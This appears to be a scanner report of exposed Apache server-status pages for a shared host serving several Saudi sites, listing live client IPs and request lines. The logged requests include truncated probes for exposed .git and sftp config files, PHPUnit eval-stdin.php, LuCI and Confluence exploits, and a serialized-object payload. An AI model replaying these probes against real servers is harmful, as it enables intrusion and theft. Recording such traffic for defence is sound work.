      0-256231/186/530K
      20.7026620044534.741.7273.89
      17.241.227.127http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1081&page=1 HTTP/1.1
      
      0-256230/200/517_
      20.68141883740.08.5993.09
      146.190.242.161http/1.1albayan.edu.sa:443GET /.vscode/sftp.json HTTP/1.1
      
      0-256230/131/483_
      20.659961117240.08.5777.62
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1434&t=167.114.100.201&c=5 HT
      
      0-256230/154/477_
      20.56290272232090.05.0416.53
      51.252.135.129http/1.1jawad.com.sa:443POST /api/v.1/front/contact/list HTTP/1.1
      
      0-256230/173/444_
      20.677322688320.09.5766.37
      47.128.23.215http/1.1daris.live:443GET /bin/admin/files/icons/social-media.svg HTTP/1.1
      
      0-256230/158/398_
      20.481801993180.031.1563.14
      146.190.242.161http/1.1
      
      0-256230/160/494_
      20.5724141639740.07.3346.50
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1355&t=65.108.0.71&c=5 HTTP/1
      
      0-256230/254/501_
      20.691021122590.05.4326.99
      146.190.242.161http/1.1albayan.edu.sa:443GET /.git/config HTTP/1.1
      
      0-256230/279/486_
      20.651013607490.013.6490.71
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1718199231.70031499862670898437
      
      0-256230/127/491_
      20.5530022547800.011.6377.29
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      1-2230910/195/747_
      26.281801519670.093.26137.28
      146.190.242.161http/1.1
      
      1-2230910/204/575_
      26.3230621459160.073.2092.76
      47.128.25.244http/1.1daris.live:443GET /bin/admin/social%20icon/youtube.png HTTP/1.1
      
      1-2230910/196/664_
      26.2940503106230.010.1156.84
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1135&t=95.216.45.152&c=5 HTTP
      
      1-2230910/239/543_
      26.3426622306010.022.7439.40
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1354&t=95.91.111.85&c=5 HTTP/
      
      1-2230910/230/741_
      26.517321079480.012.6741.17
      47.128.23.215http/1.1daris.live:443GET /bin/admin/social%20icon/facebook.png HTTP/1.1
      
      1-2230911/238/661K
      26.541277255804252.610.5433.79
      52.167.144.186http/1.1albayan.edu.sa:443GET /imgweb/file42/sc3.pdf HTTP/1.1
      
      1-2230910/177/677_
      26.3039101148440.020.72105.77
      195.1
      Found on 2024-06-12 13:35
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140f0ba21b3

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 12-Jun-2024 13:38:29 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  1 day 9 hours 35 minutes 24 seconds
      Server load: 0.54 0.42 0.41
      Total accesses: 128575 - Total Traffic: 14.4 GB - Total Duration: 162824415
      CPU Usage: u198.73 s29.09 cu404.1 cs83.57 - .592% CPU load
      1.06 requests/sec - 125.2 kB/second - 117.8 kB/request - 1266.38 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      _______________________K_________________K_______W__K___________
      _R__________________________________________________R___________
      __________________K__________________K____________K_____________
      __________________K___________________________________K___......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-256230/93/546_
      13.7255028296169800.04.0958.58
      66.249.76.78http/1.1jawad.com.sa:443GET /en HTTP/1.1
      
      0-256230/95/458_
      13.8280319111535840.05.6166.92
      115.164.51.16http/1.1albayan.edu.sa:443GET /imgweb/book/mfiqhi1.pdf HTTP/1.1
      
      0-256230/129/463_
      13.7628921248650.04.8331.72
      94.74.94.111http/1.1daris.live:80GET /robots.txt HTTP/1.1
      
      0-256230/117/504_
      13.70566801196080.02.9680.12
      66.249.72.37http/1.1alezdhar.com:443GET / HTTP/1.1
      
      0-256230/91/490_
      13.6965511413140.014.5386.60
      139.162.96.81http/1.1abu-helal.com:443GET /debug/default/view?panel=config HTTP/1.1
      
      0-256230/137/425_
      13.8460108628550.05.3579.00
      172.71.114.20http/1.1qr.brunch.ws:443GET /foods/211/edit?back=https%3A%2F%2Fqr.brunch.ws%2Ffoods HTT
      
      0-256230/96/561_
      13.6877011151960.022.7255.37
      46.22.135.130http/1.1new-filter.jawad.com.sa:80POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1
      
      0-256230/92/484_
      13.6632317711090.08.8428.65
      178.128.195.190http/1.1
      
      0-256230/156/499_
      13.7549490956230.010.1019.80
      40.77.167.52http/1.1albayan.edu.sa:443GET /web/38.html HTTP/1.1
      
      0-256230/141/452_
      13.7539022589190.017.9291.13
      35.185.97.220http/1.1php.we3dvi.com:80\x16\x03\x01
      
      0-256230/116/526_
      13.7255847487230.04.2176.00
      17.22.245.27http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-256230/70/429_
      13.6868321740720.07.8368.00
      185.191.127.212http/1.1php.we3dvi.com:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co
      
      0-256230/127/420_
      13.73543285909860.04.3541.00
      66.249.69.106http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-256230/94/425_
      13.73538291836700.03.6358.17
      66.249.76.38http/1.1jilani.com.sa:80GET / HTTP/1.1
      
      0-256230/125/538_
      13.76349273269370.06.2938.02
      184.72.121.156http/1.1jawad.com.sa:443GET /ar/category/110 HTTP/1.1
      
      0-256230/139/483_
      13.87801923470.038.5770.74
      91.92.243.143http/1.13dvi.com:80GET /wp-content/plugins/include.php HTTP/1.1
      
      0-256230/153/470_
      13.86384822380.04.3488.83
      31.166.154.6http/1.1jawad.com.sa:443GET /public/front_resources/css/bootstrap-flipped.min.css HTTP/
      
      0-256230/99/451_
      13.78136861098290.05.8974.94
      172.71.114.20http/1.1qr.brunch.ws:443GET /food-categories/18/edit HTTP/1.1
      
      0-256230/117/440_
      13.837942202060.03.3314.82
      31.166.154.6http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/7XbzcqLjpmlOOYOfIRlrXv
      
      0-256230/114/385_
      13.53662132571260.05.4262.21
      139.162.96.81http/1.1
      
      0-256230/113/353_
      13.753899911807510.09.7841.76
      35.185.97.220http/1.1zed.sa:443GET /aab9 HTTP/1.1
      
      0-256230/81/415_
      13.6964611602390.05.4544.61
      139.162.96.81http/1.1abu-helal.com:443GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-256230/110/357_
      13.7453421084290.03.8725.43
      42.83.147.53http/1.1alnwisher.com:80GET / HTTP/1.1
      
      0-256231/103/310K
      13.8701582000.912.9490.01
      162.158.62.220http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-256230/86/450_
      13.7621702498210.03.5069.17
      31.167.29.106http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      1-2230910/148/700_
      18.90101911467950.081.81125.83
      172.71.114.21http/1.1qr.brunch.ws:443GET /food-categories HTTP/1.1
      
      1-2230910/161/532_
      18.55661141444620.071.6491.20
      139.162.96.81http/1.1
      
      1-2230910/169/637_
      18.834843973082850.09.6256.35
      172.70.158.136http/1.1qr.brunch.ws:443GET /dar-zed HTTP/1.1
      
      1-2230910/204/508_
      18.81549292255340.019.8836.54
      66.249.76.44http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      1-2230910/164/675_
      18.88130101032960.08.8437.34
      66.118.184.144http/1.13dvi.com:443GET /v/sibaqulhorof/ HTTP/1.1
      
      1-2230910/201/624_
      18.8438910962428660.05.0328.28
      35.185.97.220http/1.1zed.sa:80GET /aaa9 HTTP/1.1
      
      1-2230910/143/643_
      18.85342447904470.07.7992.84
      40.77.167.30http/1.1sulaimaniya.edu.sa:443GET /2024/05/ HTTP/1.1
      
      1-2230910/159/494_
      18.776792152384500.055.6390.16
      93.112.220.149http/1.1albayan.edu.sa:443GET /images/slider/out.jpg HTTP/1.1
      
      1-2230910/276/691_
      18.9336322027300.017.3744.55
      31.166.154.6http/1.1jawad.com.sa:443
      Found on 2024-06-12 10:38
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140e9220fcb

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 10-Jun-2024 12:33:46 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 11
      Parent Server MPM Generation: 10
      Server uptime:  18 days 8 hours 28 minutes 56 seconds
      Server load: 0.25 0.34 0.43
      Total accesses: 2711091 - Total Traffic: 392.9 GB - Total Duration: 3070354769
      CPU Usage: u1463.3 s152.79 cu10795.9 cs2489.18 - .94% CPU load
      1.71 requests/sec - 259.8 kB/second - 151.9 kB/request - 1132.52 ms/request
      25 requests currently being processed, 0 workers gracefully restarting, 225 idle workers
      ________________K__K_________K__________________W_K_______KK____
      R___________K___K____________________________________K____KK_WWW
      WWWWWWWWWWWWWWWWWWWWWW______________________K_K___________K_____
      _K_______________K_______K_K_____________________K_K_____K______
      __K__K_____________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-10150090/1323/12706_
      79.21902112890360.037.001803.70
      31.167.85.12http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/__________%20______
      
      0-10150090/880/10951_
      77.701562575130080.018.331738.45
      161.35.56.30http/1.1
      
      0-10150090/913/11260_
      78.29311210566831300.074.221650.36
      52.167.144.17http/1.1albayan.edu.sa:443GET /imgweb/2/Tawheedstd22.pdf HTTP/1.1
      
      0-10150090/1114/11634_
      78.8419051402892160.016.921722.93
      103.166.13.139http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=1 HTTP/1.1
      
      0-10150090/877/11591_
      77.89380288617330.014.531608.94
      151.255.39.203http/1.13dvi.com:443GET /v/sibaqulhorof/ HTTP/1.1
      
      0-10150090/1081/11281_
      77.9434157168616030.013.661982.89
      198.12.234.118http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/1154/11645_
      78.472652159609510.032.641811.59
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=2473.eot HTTP/1
      
      0-10150090/1080/11294_
      79.20982226981810.023.531871.75
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=1308.php HTTP/1
      
      0-10150090/1063/12318_
      78.30308290750880.041.751899.45
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=2356.pdf HTTP/1
      
      0-10150090/1016/11882_
      78.65228280925070.015.341669.21
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=1210.css HTTP/1
      
      0-10150090/1105/11537_
      77.8939447293401660.013.901404.82
      31.167.87.177http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1646&page=1 HTTP/1.1
      
      0-10150090/1246/12191_
      79.3939268766210.022.381365.70
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=sa.php HTTP/1.1
      
      0-10150090/1002/11823_
      77.88398294255670.032.711969.46
      171.25.193.25http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=181.gif HTTP/1.
      
      0-10150090/1157/11423_
      79.03145280478470.017.861815.90
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=2091.kenburns H
      
      0-10150090/874/11222_
      78.522499129306210.016.191297.82
      66.249.70.7http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      0-10150090/1328/11723_
      77.903464452684820.017.171458.69
      43.159.149.165http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-101500942/1027/11521K
      79.5302339164111822.823.231734.96
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=355.jpg HTTP/1.
      
      0-10150090/1016/11681_
      76.06453354110652700.016.281997.24
      31.167.87.177http/1.1
      
      0-10150090/1036/11749_
      78.35291371206970.024.141730.26
      94.205.145.242http/1.1wahjcm.com:443GET /js/flatpickr.min.js HTTP/1.1
      
      0-10150091/988/12018K
      79.531192972070.840.971620.07
      172.69.130.28http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-10150090/1218/11358_
      78.871872231978810.020.071665.73
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=1636.woff HTTP/
      
      0-10150090/1346/11874_
      77.903645784206920.018.941556.85
      194.233.88.159http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/840/11348_
      79.306530874044220.010.351721.29
      51.39.215.196http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A7%D9%88%D8%A7%D8%A6%D9%84%20%D8%A7%D9%88%
      
      0-10150090/902/11507_
      78.801985201133250.025.162018.79
      103.166.13.139http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-10150090/1121/11771_
      77.78425289196410.013.091917.72
      31.167.87.177http/1.1albayan.edu.sa:443GET /registration/js/bootstrap-filestyle.min.js HTTP/1.1
      
      1-10315820/1062/11186_
      71.921918110559980.027.091985.06
      94.205.145.242http/1.1wahjcm.com:443POST /api/slides/list HTTP/1.1
      
      1-10315820/1112/11796_
      71.30226294783840.0112.121892.91
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=1232.svg HTTP/1
      
      1-10315820/977/11855_
      70.464217191266370.032.081814.28
      40.77.167.28http/1.1albayan.edu.sa:443GET /web/352.html2 HTTP/1.1
      
      1-10315820/740/11446_
      70.803403128371920.09.271400.40
      31.167.87.177http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      1-103158241/961/11146K
      72.010285589311779.516.561602.44
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=355.pdf HTTP/1.
      
      1-10315820/1102/11783_
      72.011280822180.016.681583.53
      172.69.130.28http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-10315820/744/11081_
      6
      Found on 2024-06-10 09:33
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140c9f3966a

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 10-Jun-2024 12:33:45 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 11
      Parent Server MPM Generation: 10
      Server uptime:  18 days 8 hours 28 minutes 55 seconds
      Server load: 0.27 0.35 0.44
      Total accesses: 2711078 - Total Traffic: 392.9 GB - Total Duration: 3070354444
      CPU Usage: u1463.24 s152.79 cu10795.9 cs2489.18 - .94% CPU load
      1.71 requests/sec - 259.8 kB/second - 151.9 kB/request - 1132.52 ms/request
      22 requests currently being processed, 0 workers gracefully restarting, 228 idle workers
      ________________K__K_________K____________________K________W____
      R___________K___K____________________________________K____KK_WWW
      WWWWWWWWWWWWWWWWWWWWWW______________________K_K___________K_____
      _K_______________K_______K_______________________K_K_____K______
      __K__K_____________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-10150090/1323/12706_
      79.21902112890360.037.001803.70
      31.167.85.12http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/__________%20______
      
      0-10150090/880/10951_
      77.701462575130080.018.331738.45
      161.35.56.30http/1.1
      
      0-10150090/913/11260_
      78.29310210566831300.074.221650.36
      52.167.144.17http/1.1albayan.edu.sa:443GET /imgweb/2/Tawheedstd22.pdf HTTP/1.1
      
      0-10150090/1114/11634_
      78.8419051402892160.016.921722.93
      103.166.13.139http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=1 HTTP/1.1
      
      0-10150090/877/11591_
      77.89379288617330.014.531608.94
      151.255.39.203http/1.13dvi.com:443GET /v/sibaqulhorof/ HTTP/1.1
      
      0-10150090/1081/11281_
      77.9434057168616030.013.661982.89
      198.12.234.118http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/1154/11645_
      78.472652159609510.032.641811.59
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=2473.eot HTTP/1
      
      0-10150090/1080/11294_
      79.20982226981810.023.531871.75
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=1308.php HTTP/1
      
      0-10150090/1063/12318_
      78.30307290750880.041.751899.45
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=2356.pdf HTTP/1
      
      0-10150090/1016/11882_
      78.65228280925070.015.341669.21
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=1210.css HTTP/1
      
      0-10150090/1105/11537_
      77.8939447293401660.013.901404.82
      31.167.87.177http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1646&page=1 HTTP/1.1
      
      0-10150090/1246/12191_
      79.3938268766210.022.381365.70
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=sa.php HTTP/1.1
      
      0-10150090/1002/11823_
      77.88397294255670.032.711969.46
      171.25.193.25http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=181.gif HTTP/1.
      
      0-10150090/1157/11423_
      79.03144280478470.017.861815.90
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=2091.kenburns H
      
      0-10150090/874/11222_
      78.522499129306210.016.191297.82
      66.249.70.7http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      0-10150090/1328/11723_
      77.903454452684820.017.171458.69
      43.159.149.165http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-101500941/1026/11520K
      79.5302339164061779.523.191734.92
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=355.woff HTTP/1
      
      0-10150090/1016/11681_
      76.06452354110652700.016.281997.24
      31.167.87.177http/1.1
      
      0-10150090/1036/11749_
      78.35290371206970.024.141730.26
      94.205.145.242http/1.1wahjcm.com:443GET /js/flatpickr.min.js HTTP/1.1
      
      0-10150091/988/12018K
      79.530192972070.840.971620.07
      172.69.130.28http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-10150090/1218/11358_
      78.871872231978810.020.071665.73
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=1636.woff HTTP/
      
      0-10150090/1346/11874_
      77.903635784206920.018.941556.85
      194.233.88.159http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/840/11348_
      79.306530874044220.010.351721.29
      51.39.215.196http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A7%D9%88%D8%A7%D8%A6%D9%84%20%D8%A7%D9%88%
      
      0-10150090/902/11507_
      78.801975201133250.025.162018.79
      103.166.13.139http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-10150090/1121/11771_
      77.78424289196410.013.091917.72
      31.167.87.177http/1.1albayan.edu.sa:443GET /registration/js/bootstrap-filestyle.min.js HTTP/1.1
      
      1-10315820/1062/11186_
      71.921818110559980.027.091985.06
      94.205.145.242http/1.1wahjcm.com:443POST /api/slides/list HTTP/1.1
      
      1-10315820/1112/11796_
      71.30226294783840.0112.121892.91
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=1232.svg HTTP/1
      
      1-10315820/977/11855_
      70.464217191266370.032.081814.28
      40.77.167.28http/1.1albayan.edu.sa:443GET /web/352.html2 HTTP/1.1
      
      1-10315820/740/11446_
      70.803403128371920.09.271400.40
      31.167.87.177http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      1-103158241/961/11146K
      72.010285589311779.516.561602.44
      185.233.100.23http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=355.pdf HTTP/1.
      
      1-10315820/1102/11783_
      72.010280822180.016.681583.53
      172.69.130.28http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-10315820/744/11081_
      
      Found on 2024-06-10 09:33
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831400f88903b

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 08-Jun-2024 19:06:38 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  16 days 15 hours 1 minute 48 seconds
      Server load: 0.46 0.41 0.39
      Total accesses: 2239713 - Total Traffic: 352.9 GB - Total Duration: 2812989159
      CPU Usage: u898.39 s80.08 cu9634.31 cs2184.96 - .891% CPU load
      1.56 requests/sec - 257.6 kB/second - 165.2 kB/request - 1255.96 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 188 idle workers
      ______________________K________________L_______K________________
      ___________________________K_____K____________________W______WWW
      WWWWWWWWWWWWWWWWWWWWWW_________K______________________K_K_______
      ________.........................__C__K__K________________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9226310/8/10436_
      0.32705107572450.00.021601.42
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=892&t=136.243.37.219&c=5 HTTP
      
      0-9226310/11/9230_
      0.3370369791150.00.181637.67
      45.244.69.143http/1.1albayan.edu.sa:443GET /e_sch/css/images/play.png HTTP/1.1
      
      0-9226310/3/9531_
      0.3080159668320.05.961487.15
      64.226.65.160http/1.1thenewjeddah.com:443GET / HTTP/1.1
      
      0-9226310/7/9558_
      0.31771395037700.00.011559.32
      64.226.65.160http/1.1thenewjeddah.com:443GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-9226310/1/9965_
      0.1180183087220.00.011548.15
      64.226.65.160http/1.1
      
      0-9226310/1/9270_
      0.36192161345610.00.021786.70
      41.130.142.29http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9226310/1/9665_
      0.31801156522780.00.001701.20
      64.226.65.160http/1.1thenewjeddah.com:443GET /v2/_catalog HTTP/1.1
      
      0-9226310/2/9470_
      0.3466199223664230.00.171713.01
      89.248.172.92http/1.1trydaris.com:443GET /?_&opauth=TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUph
      
      0-9226310/7/10258_
      0.342965779243760.00.331717.51
      18.236.120.101http/1.1sulaimaniya.edu.sa:443GET /2023/ HTTP/1.1
      
      0-9226310/4/9980_
      0.373176053870.00.001565.69
      172.70.114.2http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-9226310/14/9452_
      0.3730289641700.00.891260.96
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=940&t=89.163.242.56&c=5 HTTP/
      
      0-9226310/7/10149_
